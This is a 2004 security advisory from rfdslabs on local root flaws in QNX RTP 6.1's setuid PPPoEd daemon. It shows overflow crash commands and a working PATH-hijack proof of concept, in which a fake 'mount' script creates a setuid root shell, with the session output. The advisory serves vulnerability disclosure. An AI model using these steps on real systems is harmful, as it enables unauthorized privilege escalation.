qnx-pppoed-multiple-flaws.txt

` *** rfdslabs security advisory ***  
  
Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004]  
Versions: QNX RTP 6.1 (possibly others)  
Vendor: http://www.qnx.com  
Date: 02 Sep 2004  
  
Author: Julio Cesar Fort <julio at rfdslabs com br>  
  
  
1. Introduction  
  
PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX  
users. More information can be found at QNX Developer Support:  
www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html  
There are two vulnerabilities that can lead to local root access.  
  
2. Details  
  
#1 Buffer overflow  
  
PPPoEd has multiple problems with bounds checking. Almost every flag with  
oversized length crashes PPPoEd, overwriting memory. Once it is by default suid  
owned by root, an attacker can execute arbitrary instructions to elevate privi-  
ledges. Above is an example to cause this overflow.  
  
$ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)  
$ /usr/bin/pppoed -F $overflow256  
Memory fault (core dumped)  
$ /usr/bin/pppoed service=$overflow256  
Memory fault (core dumped)  
...  
And it repeats in 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout',  
'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac' flags.  
  
  
#2 Old $PATH trick  
  
PPPoEd calls "mount -T io-net npm-pppoe.so" without full path. If someone  
wants to cheat PPPoEd and tricks it to execute his own malicious code, it can  
be possible modifying $PATH. With this modification, '/usr/sbin/pppoed' will  
simple execute 'mount' (hostile code) looking for it at /tmp directory.  
Simple proof-of-concept steps are above.  
  
$ cd /tmp  
$ cat << _EOF_ > mount  
#!/bin/sh  
cp /bin/sh /tmp/rootshell  
chown root /tmp/rootshell  
chmod 4777 /tmp/rootshell  
echo "Here comes your root shell"  
_EOF_  
  
$ chmod 755 mount  
$ export PATH=/tmp:$PATH  
$ /usr/sbin/pppoed  
$ ls -la /tmp  
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount  
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell  
$ /tmp/rootshell  
Here comes your root shell  
# uname -a  
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86  
#  
  
3. Solution  
  
rfdslabs tried to contact QNX Software Systems but no security staff e-mail  
was found. No solution yet.  
  
4. Timeline  
  
27 Aug 2004: Vulnerabilities detected;  
28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success;  
02 Sep 2004: Advisory written and sent to security mail-lists.  
  
Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs.  
  
www.rfdslabs.com.br - computers, sex, humand mind and more  
Recife, PE, Brazil  
`